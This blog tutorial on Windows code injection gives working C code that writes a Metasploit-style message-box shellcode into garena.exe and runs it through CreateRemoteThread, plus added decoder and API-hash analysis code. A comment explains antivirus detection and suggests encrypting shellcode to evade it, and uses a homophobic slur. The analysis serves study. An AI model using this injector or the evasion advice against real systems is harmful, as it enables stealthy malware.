Dll Injection +1

Programming never hurts here or there!
So let's learn a method by which we can execute our own arbitrary code in another process's context.
To understand the concept you first have to understand what executable code actually is.
Under Windows there are many file extensions we may have come across but never used.
Code at its most basic level is just a sequence of bytes, each from 0x00 to 0xFF, i.e. 0-255.
A simple call such as ExitProcess(0); in C looks very different as the real machine code we will be working with in this experiment.
in C
#include <windows.h>
int main()
{ExitProcess(0);}
in machine lingua (x86 assembly)
xor eax,eax          ; exit code 0
push eax             ; the single argument
mov eax,0x77E798FD   ; address of kernel32!ExitProcess as it was on the author's system
call eax

Each line is one instruction, and assembled they become the bytes 0x33 0xC0 0x50 0xB8 0xFD 0x98 0xE7 0x77 0xFF 0xD0.
In this raw form this is code that calls the Windows ExitProcess API and so terminates whichever process it happens to execute in. Two things to notice: opcode 0xB8 loads an immediate, so the four bytes 0xFD 0x98 0xE7 0x77 are the address 0x77E798FD written little-endian (low byte first); and because that address is hard-coded, the bytes only work where kernel32.dll is mapped at the same base. Other Windows builds, and ASLR from Vista onward, move it.
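To make the byte-to-instruction mapping concrete, here is a small decoder for the four instruction forms the stub above uses. It is an added example, not code from the post: it takes the ten bytes listed above, prints each instruction beside its bytes, and recovers the immediate carried by the mov, which is how you confirm that 0xB8 loads a fixed, little-endian address rather than reading one from memory. The decoder, the insn_t type and the function names are this example's own.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* The ten bytes the post lists for its ExitProcess(0) stub. */
static const uint8_t exit_stub[] = {0x33,0xC0,0x50,0xB8,0xFD,0x98,0xE7,0x77,0xFF,0xD0};

typedef struct {
    size_t   len;       /* bytes consumed */
    int      has_imm32; /* 1 when the form carries a 32-bit immediate */
    uint32_t imm32;
    char     text[32];  /* Intel-syntax listing */
} insn_t;

static const char *const reg32[8] = {"eax","ecx","edx","ebx","esp","ebp","esi","edi"};

/* Decode one instruction from the subset such stubs use:
 *   33 /r       xor r32, r32   (register-direct ModRM only)
 *   50+r        push r32
 *   B8+r imm32  mov r32, imm32 (immediate stored little-endian)
 *   FF /2       call r32       (register-direct ModRM only)
 * Returns the length, or 0 for anything else or a truncated buffer. */
size_t decode_stub_insn(const uint8_t *p, size_t avail, insn_t *out)
{
    memset(out, 0, sizeof *out);
    if (avail == 0)
        return 0;
    if (p[0] >= 0x50 && p[0] <= 0x57) {
        snprintf(out->text, sizeof out->text, "push %s", reg32[p[0] - 0x50]);
        return out->len = 1;
    }
    if (p[0] >= 0xB8 && p[0] <= 0xBF) {
        if (avail < 5)
            return 0;
        out->imm32 = (uint32_t)p[1] | (uint32_t)p[2] << 8 |
                     (uint32_t)p[3] << 16 | (uint32_t)p[4] << 24;
        out->has_imm32 = 1;
        snprintf(out->text, sizeof out->text, "mov %s, 0x%08X",
                 reg32[p[0] - 0xB8], (unsigned)out->imm32);
        return out->len = 5;
    }
    if (p[0] == 0x33 && avail >= 2 && (p[1] & 0xC0) == 0xC0) {
        /* ModRM 11 reg rm: reg is the destination, rm the source */
        snprintf(out->text, sizeof out->text, "xor %s, %s",
                 reg32[(p[1] >> 3) & 7], reg32[p[1] & 7]);
        return out->len = 2;
    }
    if (p[0] == 0xFF && avail >= 2 && (p[1] & 0xF8) == 0xD0) {
        /* ModRM 11 010 rm: /2 selects CALL */
        snprintf(out->text, sizeof out->text, "call %s", reg32[p[1] & 7]);
        return out->len = 2;
    }
    return 0;
}

/* Decode a whole buffer, optionally printing a listing. Returns the number
 * of instructions, or 0 if any byte could not be decoded. *target receives
 * the last immediate seen, i.e. the hard-coded address such a stub calls. */
size_t decode_stub(const uint8_t *code, size_t len, uint32_t *target, int print)
{
    size_t off = 0, count = 0;
    insn_t in;
    *target = 0;
    while (off < len) {
        size_t n = decode_stub_insn(code + off, len - off, &in);
        if (n == 0)
            return 0;
        if (in.has_imm32)
            *target = in.imm32;
        if (print) {
            size_t i;
            printf("%04lx  ", (unsigned long)off);
            for (i = 0; i < n; i++)
                printf("%02X ", code[off + i]);
            for (; i < 5; i++)
                printf("   ");
            printf(" %s\n", in.text);
        }
        off += n;
        count++;
    }
    return count;
}

int main(void)
{
    uint32_t target;
    size_t n = decode_stub(exit_stub, sizeof exit_stub, &target, 1);
    printf("%lu instructions; the stub calls 0x%08X, which is only valid where\n"
           "kernel32.dll is mapped at the same base as on the machine it came from\n",
           (unsigned long)n, (unsigned)target);
    return n == 4 ? 0 : 1;
}
```

The decoder refuses anything it does not know and anything cut short, so feeding it the seven-byte prefix of the stub fails at the truncated mov instead of guessing. That is the right default for a tool that inspects bytes about to be written into another process.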


Now that we have our resources, we need a little knowledge of the different file types. All of the following are PE (portable executable) images; the extension only tells Windows how to use them:
.cpl control panel applet (a DLL)
.exe portable executable program
.dll dynamic link library
.ocx 
ActiveX/COM control (a DLL)
.sys kernel-mode driver
.scr screensaver (an EXE)
.drv legacy driver library (a DLL)

what we are concerned with here are .dll and .exe
theory
using Dev-C++, an open-source C++ IDE that bundles the MinGW port of GCC,
we will create a sample DLL that prints a hello-world message.
dll name = sample.dll
injecting that DLL into another process's context then means:
creating the process in a suspended state
allocating 11 bytes in it (the 10 characters plus the terminating NUL)
writing "sample.dll" into that memory (a full path is safer, since the name is resolved with the target's search order, not ours)
creating a thread in the target process whose start routine is LoadLibraryA and whose argument is the address of that string, so the target loads the DLL itself.

in practice:

create a source file in Dev-C++ and write this
#include <windows.h>
#include <stdio.h>
#include <string.h>

/* Writes nSize bytes to lpBaseAddress, making the page writable first and
   restoring the old protection afterwards. With hProcess == NULL the write is
   local (memcpy); otherwise it goes through WriteProcessMemory. */
BOOL WriteProcessBytes(HANDLE hProcess, LPVOID lpBaseAddress, LPCVOID lpBuffer, SIZE_T nSize)
{
DWORD dwOldProtect;
BOOL boolReturn = FALSE;

if(hProcess == NULL)
{
VirtualProtect(lpBaseAddress, nSize, PAGE_EXECUTE_READWRITE, &dwOldProtect);
memcpy(lpBaseAddress, lpBuffer, nSize); /* memcpy cannot fail, so there is no result to test */
boolReturn = TRUE;
VirtualProtect(lpBaseAddress, nSize, dwOldProtect, &dwOldProtect);
}
else
{
VirtualProtectEx(hProcess, lpBaseAddress, nSize, PAGE_EXECUTE_READWRITE, &dwOldProtect);
boolReturn = WriteProcessMemory(hProcess, lpBaseAddress, lpBuffer, nSize, NULL);
VirtualProtectEx(hProcess, lpBaseAddress, nSize, dwOldProtect, &dwOldProtect);
}

return boolReturn;
}
int main()
{
BYTE shellcode[]="\xd9\xeb\x9b\xd9\x74\x24\xf4\x31\xd2\xb2"
"\x77\x31\xc9\x64\x8b\x71\x30\x8b\x76\x0c"
"\x8b\x76\x1c\x8b\x46\x08\x8b\x7e\x20\x8b"
"\x36\x38\x4f\x18\x75\xf3\x59\x01\xd1\xff"
"\xe1\x60\x8b\x6c\x24\x24\x8b\x45\x3c\x8b"
"\x54\x28\x78\x01\xea\x8b\x4a\x18\x8b\x5a"
"\x20\x01\xeb\xe3\x34\x49\x8b\x34\x8b\x01"
"\xee\x31\xff\x31\xc0\xfc\xac\x84\xc0\x74"
"\x07\xc1\xcf\x0d\x01\xc7\xeb\xf4\x3b\x7c"
"\x24\x28\x75\xe1\x8b\x5a\x24\x01\xeb\x66"
"\x8b\x0c\x4b\x8b\x5a\x1c\x01\xeb\x8b\x04"
"\x8b\x01\xe8\x89\x44\x24\x1c\x61\xc3\xb2"
"\x08\x29\xd4\x89\xe5\x89\xc2\x68\x8e\x4e"
"\x0e\xec\x52\xe8\x9f\xff\xff\xff\x89\x45"
"\x04\xbb\x7e\xd8\xe2\x73\x87\x1c\x24\x52"
"\xe8\x8e\xff\xff\xff\x89\x45\x08\x68\x6c"
"\x6c\x20\x41\x68\x33\x32\x2e\x64\x68\x75"
"\x73\x65\x72\x88\x5c\x24\x0a\x89\xe6\x56"
"\xff\x55\x04\x89\xc2\x50\xbb\xa8\xa2\x4d"
"\xbc\x87\x1c\x24\x52\xe8\x61\xff\xff\xff"
"\x68\x6f\x78\x58\x20\x68\x61\x67\x65\x42"
"\x68\x4d\x65\x73\x73\x31\xdb\x88\x5c\x24"
"\x0a\x89\xe3\x68\x58\x20\x20\x20\x68\x4d"
"\x53\x46\x21\x68\x72\x6f\x6d\x20\x68\x6f"
"\x2c\x20\x66\x68\x48\x65\x6c\x6c\x31\xc9"
"\x88\x4c\x24\x10\x89\xe1\x31\xd2\x52\x53"
"\x51\x52\xff\xd0\x31\xc0\x50\xff\x55\x08";
HANDLE hProcess;       //** The process we inject into
LPVOID lpRemoteCode;   //** Buffer in the target that receives the shellcode
HANDLE hRemoteThread;  //** Thread that runs it
char szTarget[] = "C:\\Program Files (x86)\\Garena\\garena.exe"; //** lpCommandLine must be writable

STARTUPINFO si;
PROCESS_INFORMATION pi;
ZeroMemory( &si, sizeof(si) );
si.cb = sizeof(si);
ZeroMemory( &pi, sizeof(pi) );
//** Start the target. With NORMAL_PRIORITY_CLASS alone it runs at once and the
//** ResumeThread() below is a no-op; add CREATE_SUSPENDED to hold its main
//** thread until then, as the theory section describes.
if(!CreateProcess(NULL, szTarget, NULL, NULL, FALSE, NORMAL_PRIORITY_CLASS, NULL, NULL, &si, &pi))
{
printf("CreateProcess failed: %lu\n", GetLastError());
return 1;
}
hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, pi.dwProcessId);
if(hProcess == NULL) //** OpenProcess returns NULL on failure, not INVALID_HANDLE_VALUE
{
printf("OpenProcess failed: %lu\n", GetLastError());
return 1;
}
//** PAGE_EXECUTE_READWRITE: the remote thread executes from this buffer, and a
//** PAGE_READWRITE page faults under DEP.
lpRemoteCode = VirtualAllocEx(hProcess, NULL, sizeof(shellcode), MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE);
if(lpRemoteCode == NULL)
{
printf("VirtualAllocEx failed: %lu\n", GetLastError());
return 1;
}
if(WriteProcessBytes(hProcess, lpRemoteCode, shellcode, sizeof(shellcode)) == FALSE)
{
printf("WriteProcessMemory failed: %lu\n", GetLastError());
return 1;
}
//** The thread starts at shellcode[0], so the payload must be position-independent
hRemoteThread = CreateRemoteThread(hProcess, NULL, 0, (LPTHREAD_START_ROUTINE)lpRemoteCode, NULL, 0, NULL);
if(hRemoteThread == NULL)
{
printf("CreateRemoteThread failed: %lu\n", GetLastError());
return 1;
}
ResumeThread(pi.hThread);
CloseHandle(hRemoteThread);
CloseHandle(hProcess);
CloseHandle(pi.hThread);
CloseHandle(pi.hProcess);
return 0;
}





Then compile and run the file. As the CreateProcess call says, garena.exe starts, and a thread also runs inside it that shows the hello-world MessageBox.
The code above does not actually inject a DLL: because raw machine code was available, it is written straight into the process and a thread is started at shellcode[0]. Whatever sits at that position runs with no loader help, so it has to be position-independent code that finds the APIs it needs by itself.
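Since the thread starts at shellcode[0], it is worth checking what those bytes do before running them. The program below is an added example, not part of the post: it embeds the payload above and shows one analysis step. The loop at bytes c1 cf 0d / 01 c7 hashes each export name by rotating right 13 and adding the character, so hashing a list of candidate API names and searching for the results as little-endian immediates reveals which APIs the payload resolves. The candidate list and the helper names are this example's own.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* The payload bytes copied from the post: 270 bytes. */
static const unsigned char msf_payload[] =
"\xd9\xeb\x9b\xd9\x74\x24\xf4\x31\xd2\xb2"
"\x77\x31\xc9\x64\x8b\x71\x30\x8b\x76\x0c"
"\x8b\x76\x1c\x8b\x46\x08\x8b\x7e\x20\x8b"
"\x36\x38\x4f\x18\x75\xf3\x59\x01\xd1\xff"
"\xe1\x60\x8b\x6c\x24\x24\x8b\x45\x3c\x8b"
"\x54\x28\x78\x01\xea\x8b\x4a\x18\x8b\x5a"
"\x20\x01\xeb\xe3\x34\x49\x8b\x34\x8b\x01"
"\xee\x31\xff\x31\xc0\xfc\xac\x84\xc0\x74"
"\x07\xc1\xcf\x0d\x01\xc7\xeb\xf4\x3b\x7c"
"\x24\x28\x75\xe1\x8b\x5a\x24\x01\xeb\x66"
"\x8b\x0c\x4b\x8b\x5a\x1c\x01\xeb\x8b\x04"
"\x8b\x01\xe8\x89\x44\x24\x1c\x61\xc3\xb2"
"\x08\x29\xd4\x89\xe5\x89\xc2\x68\x8e\x4e"
"\x0e\xec\x52\xe8\x9f\xff\xff\xff\x89\x45"
"\x04\xbb\x7e\xd8\xe2\x73\x87\x1c\x24\x52"
"\xe8\x8e\xff\xff\xff\x89\x45\x08\x68\x6c"
"\x6c\x20\x41\x68\x33\x32\x2e\x64\x68\x75"
"\x73\x65\x72\x88\x5c\x24\x0a\x89\xe6\x56"
"\xff\x55\x04\x89\xc2\x50\xbb\xa8\xa2\x4d"
"\xbc\x87\x1c\x24\x52\xe8\x61\xff\xff\xff"
"\x68\x6f\x78\x58\x20\x68\x61\x67\x65\x42"
"\x68\x4d\x65\x73\x73\x31\xdb\x88\x5c\x24"
"\x0a\x89\xe3\x68\x58\x20\x20\x20\x68\x4d"
"\x53\x46\x21\x68\x72\x6f\x6d\x20\x68\x6f"
"\x2c\x20\x66\x68\x48\x65\x6c\x6c\x31\xc9"
"\x88\x4c\x24\x10\x89\xe1\x31\xd2\x52\x53"
"\x51\x52\xff\xd0\x31\xc0\x50\xff\x55\x08";
#define MSF_PAYLOAD_LEN (sizeof(msf_payload) - 1)

/* The per-character hash the payload's lookup loop computes: "ror edi,13"
 * (bytes c1 cf 0d) then "add edi,eax" (01 c7), stopping at the name's NUL. */
uint32_t ror13_hash(const char *name)
{
    uint32_t h = 0;
    for (; *name != '\0'; name++) {
        h = (h >> 13) | (h << 19);
        h += (unsigned char)*name;
    }
    return h;
}

/* Offset of the first occurrence of pat in buf, or -1. */
long find_bytes(const unsigned char *buf, size_t len, const unsigned char *pat, size_t patlen)
{
    size_t i;
    for (i = 0; i + patlen <= len; i++)
        if (memcmp(buf + i, pat, patlen) == 0)
            return (long)i;
    return -1;
}

/* Offset of a 32-bit value stored little-endian, the way x86 immediates are. */
long find_imm32(const unsigned char *buf, size_t len, uint32_t value)
{
    unsigned char le[4];
    le[0] = (unsigned char)value;
    le[1] = (unsigned char)(value >> 8);
    le[2] = (unsigned char)(value >> 16);
    le[3] = (unsigned char)(value >> 24);
    return find_bytes(buf, len, le, 4);
}

int main(void)
{
    /* Candidate export names (this example's own list): any whose hash occurs
     * as an immediate is an API the payload resolves by hash. */
    static const char *const candidates[] = {
        "LoadLibraryA", "GetProcAddress", "ExitProcess", "ExitThread",
        "WinExec", "MessageBoxA", "CreateProcessA", "VirtualAlloc",
    };
    static const unsigned char hash_loop[] = {0xc1, 0xcf, 0x0d, 0x01, 0xc7};
    size_t i;
    printf("ror13/add hash loop at offset %ld\n",
           find_bytes(msf_payload, MSF_PAYLOAD_LEN, hash_loop, sizeof hash_loop));
    for (i = 0; i < sizeof candidates / sizeof candidates[0]; i++) {
        uint32_t h = ror13_hash(candidates[i]);
        long at = find_imm32(msf_payload, MSF_PAYLOAD_LEN, h);
        if (at >= 0)
            printf("%-16s hash 0x%08x at offset %ld\n", candidates[i], (unsigned)h, at);
    }
    return 0;
}
```

Offset 128 holds 0xEC0E4E8E, the hash of LoadLibraryA, immediately after the push opcode 0x68 at offset 127. The prologue before the loop (64 8b 71 30, 8b 76 0c, 8b 76 1c) walks PEB->Ldr->InInitializationOrderModuleList and stops at the entry whose base name is exactly 12 wide characters long (38 4f 18 compares the character at index 12 with zero), which is how it locates kernel32.dll without an import table; the later push sequences build the strings "user32.dll", "MessageBox" and "Hello, from MSF!" on the stack, which matches the message box reported in the comments.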

this technique could be used to run custom code under another process.


2 comments:

viv0411 said...

Nice work.
Under Win7 it's not working.
In WinXP it displays a nice msgbox: hello from msf!
Kaspersky is detecting it as some backdoor...
The shellcode, I think, is actually a MessageBox API loaded dynamically through LoadLibrary and GetProcAddress.

InVisIbLe HaCkErzZ said...

http://imageshack.us/photo/my-images/695/clarifyj.jpg/
This should clarify everything.
You might have made some changes in the code (not the shellcode).
As for Kaspersky detecting it: the CreateRemoteThread API is called directly, thus making an entry in the import section of the executable, which allows Kaspersky's heuristic detector to flag it as a backdoor.
Also, providing shellcode directly in the code is *flaggy* as well as *faggy*: due to no encryption, any heuristic detection system will directly emulate the assembly instructions in the shellcode, without even running the binary, to check what exactly it is running. It's like having a function load all libraries and manually check the address of MessageBox in user32.dll, without any encryption and without calling this function. As a result, signature-based detection took place.
I hope this clears everything up.
Team Hack-a-Holic
